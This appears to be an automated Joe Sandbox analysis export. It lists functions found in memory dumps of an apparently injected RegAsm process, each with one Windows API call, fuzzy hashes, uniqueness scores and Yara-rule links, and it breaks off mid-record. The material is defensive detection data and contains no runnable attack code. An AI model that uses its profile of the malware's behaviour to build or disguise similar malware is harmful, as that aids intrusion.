Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 72ee0c06c986fbb8318cc04ae5e30ea104182c269d7048f9ccb32e52db43b7ea
Instruction ID: 1de27261003e73fd9789798e4be8de7f789cad3aac87232c21b613ad403c9aca
Opcode Fuzzy Hash: 72ee0c06c986fbb8318cc04ae5e30ea104182c269d7048f9ccb32e52db43b7ea
Instruction Fuzzy Hash: F821D476500204AFF721CF68DC84FABF7ECEF44724F04855AED458B242E664E5488BB2

Uniqueness

Uniqueness Score: 0.01%

Function 011276F0, Relevance: 1.6, APIs: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 455f5950ce4cc88011178b51e181103f2f9f1eb1fdd5f023109727c75a75599e
Instruction ID: 88266d2225d9e038908ef3614e1b642339e8469d0ac5d7fd2aa31ef3e9620f87
Opcode Fuzzy Hash: 455f5950ce4cc88011178b51e181103f2f9f1eb1fdd5f023109727c75a75599e
Instruction Fuzzy Hash: 5611F8C2A0EBF5D9CF3F662844E836B3E614BB7115B5B46D9D4430E889E2984074D7B3

Uniqueness

Uniqueness Score: 0.02%

Function 2292115E, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000EAC), ref: 229211D2

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: bb28acff4a5c44532dd6970387a0bf509b2df195bbe834eb579e6985c379021f
Instruction ID: 8798213ed6627b1f40054627cd56c239ef8a67e62ffb69af9439cdc25c2bdd83
Opcode Fuzzy Hash: bb28acff4a5c44532dd6970387a0bf509b2df195bbe834eb579e6985c379021f
Instruction Fuzzy Hash: D121CD71500704AFFB209F54DC84F6AFBACEF44320F04865AED448A257D670A618CB72

Uniqueness

Uniqueness Score: 0.01%

Function 1FD2AF97, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1FD2B012

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 476679b8e7f397da34c1cc48076e3358a8bb2acfbee7087ed720f9761fb9068f
Instruction ID: cbe4ce9ef344df7168f92b70cd0413e787f82581d5a63dbbe7d5474706b864af
Opcode Fuzzy Hash: 476679b8e7f397da34c1cc48076e3358a8bb2acfbee7087ed720f9761fb9068f
Instruction Fuzzy Hash: 98217FB25093C05FD7528B65DC95B96BFE8EF06210F0984DAE884CB263D265E848CB62

Uniqueness

Uniqueness Score: 0.02%

Function 229224FA, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 2292256D

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 3c56e1bcd6354a9a1cce6f5e78b6edcce05b676ace086dff30a1f6d6b259e276
Instruction ID: d7908bde2ee6d410f79de54452a034f05c693ea0e0cdad9b4a7e8895d743d369
Opcode Fuzzy Hash: 3c56e1bcd6354a9a1cce6f5e78b6edcce05b676ace086dff30a1f6d6b259e276
Instruction Fuzzy Hash: 1D219A71A042049FE710CF25DD95F66FBECEF04220F04C5AAED488B246E7B1E504CB62

Uniqueness

Uniqueness Score: 0.03%

Function 22920006, Relevance: 1.6, APIs: 1, Instructions: 72libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000EAC), ref: 2292009B

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1204682ace92cc3f2ef645db49c40973286a0f84ba774a210191e686394641ae
Instruction ID: 675fc28ac3a80f4cc9d00b9599a3550ad92b434d34aa0fda82e6c6d96521f221
Opcode Fuzzy Hash: 1204682ace92cc3f2ef645db49c40973286a0f84ba774a210191e686394641ae
Instruction Fuzzy Hash: 4C21F9711093846FE7228B24CC45FA6BFB8DF46324F1881DAED849F293D268A548C762

Uniqueness

Uniqueness Score: 0.02%

Function 01122B4B, Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000), ref: 01122BF0

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 5ae62f87b1def32ce9cb36965dd88d56a90ff991a5028f5dd77e7ad136943bca
Instruction ID: cb04b8c45ebc70bb32b6527182496ce2f8dd50e7e73a88a83ecfb5c819ecf551
Opcode Fuzzy Hash: 5ae62f87b1def32ce9cb36965dd88d56a90ff991a5028f5dd77e7ad136943bca
Instruction Fuzzy Hash: 4A11D370204222EFEB3C5F58CDC5F2D3655DB45311F320662F656AB9E1D7B4D8A08627

Uniqueness

Uniqueness Score: 1.31%

Function 1FD2ACBA, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000EAC,3CB76BEB,00000000,00000000,00000000,00000000), ref: 1FD2AD34

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2ae10c2aa6c7da655090d33d0e4d7cad5f4f91a2ed380a3d6ef26d587338ee9a
Instruction ID: 56ce4c561d7857b0d7804fb5381cca69e13bd16d2029b1c8ffb1442456089f87
Opcode Fuzzy Hash: 2ae10c2aa6c7da655090d33d0e4d7cad5f4f91a2ed380a3d6ef26d587338ee9a
Instruction Fuzzy Hash: F5219D75600204AFE760CE29DC80FA6B7E8EF44724F04855AED458B252EAA0E548CAB2

Uniqueness

Uniqueness Score: 0.02%

Function 01127741, Relevance: 1.6, APIs: 1, Instructions: 69libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 963f0cac0c217c4ef92c7002cd625b0dc95803beebef9d4f09e112c509667fef
Instruction ID: 0c154b0ae747f002f0867bbd72b04d895d255f3bccfff794a84744c2536cfd0d
Opcode Fuzzy Hash: 963f0cac0c217c4ef92c7002cd625b0dc95803beebef9d4f09e112c509667fef
Instruction Fuzzy Hash: 0111B4C290E7F5D9CF3B762844E876B3EA04AB711574B46D9D4830E84AE2980170DBB3

Uniqueness

Uniqueness Score: 0.02%

Function 2292126A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000EAC,3CB76BEB,00000000,00000000,00000000,00000000), ref: 229212DC

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c824fbd569a23f657c4f16226c9dc3800249d4f2c20296c2b46e3ea6c7727afc
Instruction ID: 0cb73d3633b5eeda369473ca7947eb4e0e4123fcaa7d447985e830aa85c1ca48
Opcode Fuzzy Hash: c824fbd569a23f657c4f16226c9dc3800249d4f2c20296c2b46e3ea6c7727afc
Instruction Fuzzy Hash: 1621CD71500704AFEB20CF15DC80FAAF7ACEF44220F0486AAED44DB266D660E504CFB1

Uniqueness

Uniqueness Score: 0.02%

Function 22922156, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 229221C1

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 99a02b16b237d741c9ab5eee0f26174260f239956c1e5560055a8e3b10296ed1
Instruction ID: 6df807e94217e885df95f74629c87f18bc7014573ad0d36f7b93530d5112b1af
Opcode Fuzzy Hash: 99a02b16b237d741c9ab5eee0f26174260f239956c1e5560055a8e3b10296ed1
Instruction Fuzzy Hash: 8721C3719043449FF710DF65DD85F56FBA8EF04220F04859AED448B256D7B5E504CB72

Uniqueness

Uniqueness Score: 0.52%

Function 22922256, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 229222CA

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: e54dc2c67f55d55a697d6c0f9dddd2b29b448204b9890fb53bcdb0f3c66a057e
Instruction ID: cde102662dde37bee75760f928cca620fcc2f626012805cc2596e020af4023fd
Opcode Fuzzy Hash: e54dc2c67f55d55a697d6c0f9dddd2b29b448204b9890fb53bcdb0f3c66a057e
Instruction Fuzzy Hash: 8221F071500644AFF721CF55DD84F5AFBE8EF08320F04865AE9848B252D7B2A648CBB2

Uniqueness

Uniqueness Score: 0.42%

Function 22923246, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EAC,3CB76BEB,00000000,00000000,00000000,00000000), ref: 229232AA

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 9847501c540962c65d8f93b3772f20322a2fffd46d95e74819f2064595565109
Instruction ID: f21f388de23c1b50f420bdfc52ec7c0b08f625d7ed21ca7b4dcdb7fe0eb5881a
Opcode Fuzzy Hash: 9847501c540962c65d8f93b3772f20322a2fffd46d95e74819f2064595565109
Instruction Fuzzy Hash: F211DF71200744AFE710CF69DC85FAAF7ACEF44220F04C6AAED04CB256E660E504CBB5

Uniqueness

Uniqueness Score: 1.47%

Function 2292446A, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

FindWindowW.USER32(?,?), ref: 229244E7

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 1645ef4ffd66a97389860be6e7c856cb68bcf448b6e66a18dca048c92cef9771
Instruction ID: 07ba8a1a5179d58a946453358a103ecd270c5796e4ce896b4aff2df7086f0972
Opcode Fuzzy Hash: 1645ef4ffd66a97389860be6e7c856cb68bcf448b6e66a18dca048c92cef9771
Instruction Fuzzy Hash: 9B2193765097C09FD7128B25DD95B92BFB8EF07324F0980DAD8848F263D264A909CB62

Uniqueness

Uniqueness Score: 1.34%

Function 22921EBA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000EAC,3CB76BEB,00000000,00000000,00000000,00000000), ref: 22921F2C

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: b957ae2ceea3b978d4c62d28b243e68429dc3e7c460997ff6492cd6c3e23a646
Instruction ID: 3014db8136b4b00582035a2dc5191983bd01691f37c8b1985dd454485814740c
Opcode Fuzzy Hash: b957ae2ceea3b978d4c62d28b243e68429dc3e7c460997ff6492cd6c3e23a646
Instruction Fuzzy Hash: 54119D72500704AFE721CE15CC80FA6F7ACEF44720F04C6AAE9458A266D761E554CBB1

Uniqueness

Uniqueness Score: 0.02%

Function 229227CA, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000EAC,3CB76BEB,00000000,00000000,00000000,00000000), ref: 22922829

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 80bd542257eedbd89779a41b90f3603f5d814228d5ff0ab08de7281dc3aba4d0
Instruction ID: 5f4ed68570f1a6509913f5f99082c5c124fe327c4c7f97efc8715686430fc3f3
Opcode Fuzzy Hash: 80bd542257eedbd89779a41b90f3603f5d814228d5ff0ab08de7281dc3aba4d0
Instruction Fuzzy Hash: 59110072900704AFEB21CF55DC80FAAFBA8EF44320F04C66AED448A256D6B4E504CBB1

Uniqueness

Uniqueness Score: 0.52%

Function 2292315E, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EAC,3CB76BEB,00000000,00000000,00000000,00000000), ref: 229231BA

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: aa6c7c13ff0c8cbe9b8887bcebe669c612f9ee0242aa8bb46cd5877ba0f08aa7
Instruction ID: 59a08643b39f8e9ee16bd77dfe93fbae0b80456fab380ddf7846fe2bb611844c
Opcode Fuzzy Hash: aa6c7c13ff0c8cbe9b8887bcebe669c612f9ee0242aa8bb46cd5877ba0f08aa7
Instruction Fuzzy Hash: 21110471604704AFE711CF58DC85FAAFBA8EF44320F04C6AAED448F246D6B4A508CBB5

Uniqueness

Uniqueness Score: 0.61%

Function 1FD2AAC7, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1FD2AB32

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 28c076ff663c911e99ce9a1a70f3c9746afa736938c776d8116c0f20e8e08d3f
Instruction ID: 5eaa73390ea982bd61f9c2409e1d48523c0e980f37a8039a5acc7dc2fbfa3f05
Opcode Fuzzy Hash: 28c076ff663c911e99ce9a1a70f3c9746afa736938c776d8116c0f20e8e08d3f
Instruction Fuzzy Hash: 59117271409780AFDB228F55DC44B62FFF4EF4A710F0885DAED858B662C375A418DB62

Uniqueness

Uniqueness Score: 0.12%

Function 011277E5, Relevance: 1.6, APIs: 1, Instructions: 61libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d3a915b1bd92b4f820e347112e5f5d5fc355f504af76791b487afb372e9d0753
Instruction ID: e856cbe0fe70646e565c21ca3ce5532d56594d7c8870ee749a66cb8c6559566f
Opcode Fuzzy Hash: d3a915b1bd92b4f820e347112e5f5d5fc355f504af76791b487afb372e9d0753
Instruction Fuzzy Hash: BD0171D290E7F5D98F3BB62854A87573EA049B711538B06D9D4830E84AE2984130EBB3

Uniqueness

Uniqueness Score: 0.02%

Function 01127526, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d1f6e422923c5b2836004b833c69d0b7ee8ce556bd2f6c981f4f01cc402b7f2e
Instruction ID: 0937f289b17d07c895f489ffe7cb629cd0b0eb7a28f8dc5a93ab720096001e8e
Opcode Fuzzy Hash: d1f6e422923c5b2836004b833c69d0b7ee8ce556bd2f6c981f4f01cc402b7f2e
Instruction Fuzzy Hash: A201F48070E777EAEF3E2A289890ABF311A9B75334F235837E807420C1E3A841B54553

Uniqueness

Uniqueness Score: 0.02%

Function 01127831, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8802EDAC,?,01128D4D,0112016E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF), ref: 011279A4

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 43c5b2da9d8bc9cf6e04e60e776d81e0d329d274aa7a15ea49616c397bec354c
Instruction ID: 7213a06baad5e732d78621a854ca4cd3ed963850a7b122f671c798930063781d
Opcode Fuzzy Hash: 43c5b2da9d8bc9cf6e04e60e776d81e0d329d274aa7a15ea49616c397bec354c
Instruction Fuzzy Hash: 920180D290EBF1C98F3BB62850E83573EA04DB311638B06D9D4830E84AE1980130EBB3

Uniqueness

Uniqueness Score: 0.02%

Function 22920032, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000EAC), ref: 2292009B

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8e8570a793c77fad50234744311cdf87a1571ec00987e44f79498fb9641a22c1
Instruction ID: f601a634e3688bc20a48e441c7011ca838393c13214bae9454ef30dd3590281b
Opcode Fuzzy Hash: 8e8570a793c77fad50234744311cdf87a1571ec00987e44f79498fb9641a22c1
Instruction Fuzzy Hash: 9F112571100304AEF720CB15DC81FAAF7A8DF44720F14C29AED445B28AD6B5A648CB76

Uniqueness

Uniqueness Score: 0.02%

Function 229215C4, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?), ref: 22921618

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 0a8643d10229694f04eb20e349c1ee253680cdded14869f988cf41f576c6fdf0
Instruction ID: c1e9df481e2efb9ec8e23a912c8a1138151b85d5da5c0becdbc10c31ebd9974a
Opcode Fuzzy Hash: 0a8643d10229694f04eb20e349c1ee253680cdded14869f988cf41f576c6fdf0
Instruction Fuzzy Hash: 921191715093C4AFD7128B25DC95B56FFA8DF06220F0880EBEC858F653D275A918CB62

Uniqueness

Uniqueness Score: 0.55%

Function 1FD2AFCA, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1FD2B012

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: cba100426168f2b2df230f48bb0e4c2b795107d12132a54420c013420635c3d8
Instruction ID: 58bd73e2517e4a598d4bd71db341aeb74a983ad0e34996eb5030e455b0979d9a
Opcode Fuzzy Hash: cba100426168f2b2df230f48bb0e4c2b795107d12132a54420c013420635c3d8
Instruction Fuzzy Hash: 40117C756003408FE751CF29D985B66FBE8EF05224F08C5AAEC58CB641E6B5E448CBA2

Uniqueness

Uniqueness Score: 0.02%

Function 2292099E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000EAC,3CB76BEB,00000000,00000000,00000000,00000000), ref: 229209F1

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 94fde8fc5b7e9197e182504a11ef949272be88abe5812bea613afc3cdb33ec4c
Instruction ID: 235545e6f377ed7ef20f8b011945f0aea202cda1599bbc31b4b5855f3941d9fc
Opcode Fuzzy Hash: 94fde8fc5b7e9197e182504a11ef949272be88abe5812bea613afc3cdb33ec4c
Instruction Fuzzy Hash: 4F010471500648AEE710CB15DC85FAAF798DF44720F14C296ED049B34AE6B4A644CAB2

Uniqueness

Uniqueness Score: 0.09%

Function 1FD2B06D, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNELBASE ref: 1FD2B0C1

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 68d4fdd331633bad66d07e59dd04b1e2d6b57108f5223294228aeda2aaa442ca
Instruction ID: ed4abf4b59b8fdfa03a4652c8b52aeb931e30444efac932c0c228a2b61d1b366
Opcode Fuzzy Hash: 68d4fdd331633bad66d07e59dd04b1e2d6b57108f5223294228aeda2aaa442ca
Instruction Fuzzy Hash: 9611C2B55097809FD701CF25DD85B92FFA4EF02324F0980EAEC448F253D274A509CB62

Uniqueness

Uniqueness Score: 3.15%

Function 229206FE, Relevance: 1.6, APIs: 1, Instructions: 50UNIQUE

Download Yara Rule

APIs

GetFileSecurityW.KERNELBASE(?,?,?,?,3CB76BEB), ref: 22920749

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: FileSecurity
String ID:
API String ID: 200422441-0
Opcode ID: d3a4a9a560527bdc71d66a8bc78327d2eea6f684d41f65dfc13e0ec85b345fb0
Instruction ID: fed6d98fadf38d5a71e564d0cae2625c80308f4dd8af768cccc13ffbafc06411
Opcode Fuzzy Hash: d3a4a9a560527bdc71d66a8bc78327d2eea6f684d41f65dfc13e0ec85b345fb0
Instruction Fuzzy Hash: 311179716007009FEB10CF59DD85B56FBE8EF14220F08C6AADD498B21AE271E508CF72

Uniqueness

Uniqueness Score: 100.00%

Function 1FD2A23C, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 1FD2A290

Memory Dump Source

Source File: 0000000A.00000002.16908722186.000000001FD2A000.00000040.00000001.sdmp, Offset: 1FD2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1fd2a000_RegAsm.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cb59f78a7ced76a34b771c9a05fc63048bb4f225fcbbd556028ea0cfddcadc08
Instruction ID: 4b18ebd2aad8f0372a14bdaffda6ce674a2d1f222fc2327d7ac3e2de0f5d3b67
Opcode Fuzzy Hash: cb59f78a7ced76a34b771c9a05fc63048bb4f225fcbbd556028ea0cfddcadc08
Instruction Fuzzy Hash: 7C11AD714093C4AFD7128B15DC84B62FFB4DF46224F0884CAED848F262D265A808DBB2

Uniqueness

Uniqueness Score: 0.01%

Function 22920C1E, Relevance: 1.5, APIs: 1, Instructions: 47pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNELBASE(?,00000EAC,?,?), ref: 22920C6E

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: CreatePipe
String ID:
API String ID: 2719314638-0
Opcode ID: 647e1efb73f475ecb25d035f2e7732e4913815a51f2298beede48801e32a7816
Instruction ID: b8773d84081eb3a5091f54b1acec5fe25f2fc815501c953524f66023fab24091
Opcode Fuzzy Hash: 647e1efb73f475ecb25d035f2e7732e4913815a51f2298beede48801e32a7816
Instruction Fuzzy Hash: 87015E71A00200AFD350DF16DC86B26FBA8EF89A20F14815AED089B741D271F515CBA6

Uniqueness

Uniqueness Score: 0.34%

Function 22923366, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000EAC,?,?), ref: 229233B6

Memory Dump Source

Source File: 0000000A.00000002.16916375407.0000000022920000.00000040.00000001.sdmp, Offset: 22920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22920000_RegAsm.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: e1dfab248fdcb79f7da5051fc0a93d6d369320f2f8006b5bc4dc1b40bbe21ad8
Instruction ID: afa42222d7bcfae32fd729a6dae8ee013393b6a4c3c43537f27fa87b1973cb26
Opcode Fuzzy Hash: e1dfab248fdcb79f7da5051fc0a93d6d369320f2f8006b5bc4dc1b40bbe21ad8
Instruction Fuzzy Hash: 4D015E71A00200AFD310DF16DC86B26FBA8EF89A20F14815AED089B741D271F515CBA6

Uniqueness

Uniqueness Score: 0.15%

Function 01122B50, Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000), ref: 01122BF0

Memory Dump Source

Source File: 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1120000_RegAsm.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 1069b2b94158c9e3f598a1d91a49fed0dc276295e4bd54f266ae3489f68d54cc
